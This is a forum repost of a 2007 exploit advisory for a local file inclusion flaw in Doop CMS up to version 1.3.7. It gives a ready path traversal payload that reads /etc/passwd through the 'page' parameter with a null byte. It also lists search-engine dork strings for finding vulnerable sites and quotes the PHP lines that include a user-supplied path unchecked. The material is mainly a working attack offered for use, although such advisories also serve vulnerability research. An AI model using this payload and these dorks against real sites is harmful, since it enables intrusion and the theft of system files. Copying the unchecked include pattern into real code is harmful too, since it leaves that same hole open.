Jump to content
vladiii

[RST] Doop CMS <= 1.3.7 (page) Local File Inclusion

Recommended Posts

Posted


______________________________________________________
| DOOP CMS <=1.3.7 Local File Inclusion |
|______________________________________________________|

______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
| |
| dork: Doop CMS |
| dork2: powered by Doop CMS |
| |
| work only if magic_quotes_gpc are set to OFF |
|______________________________________________________|

______________________________________________________
| vuln code: |
| line 544: |
| if (!isset($_REQUEST['page'])){ |
| $_REQUEST['page']=$homepage; |
| $cpage=$_REQUEST['page']; |
| } else { $cpage=$_REQUEST['page']; } |
| |
| line 646: |
| if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
| if (file_exists("pages/".$cpage.".htm")){ |
| include("pages/".$cpage.".htm"); |
| } |
| else include("pages/".$cpage.".html"); |
| } |
|______________________________________________________|
______________________________________________________
| greetz to: [url]http://vladii.wordpress.com[/url] |
| [url]http://rstcenter.com[/url] |
| [url]http://hackpedia.info[/url] |
| SlicK & Shocker & moubik & kw3 |
|______________________________________________________|

______________________________________________________
| @vladii 2007 |
|______________________________________________________|

# milw0rm.com [2007-10-15]

http://milw0rm.org/exploits/4536

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...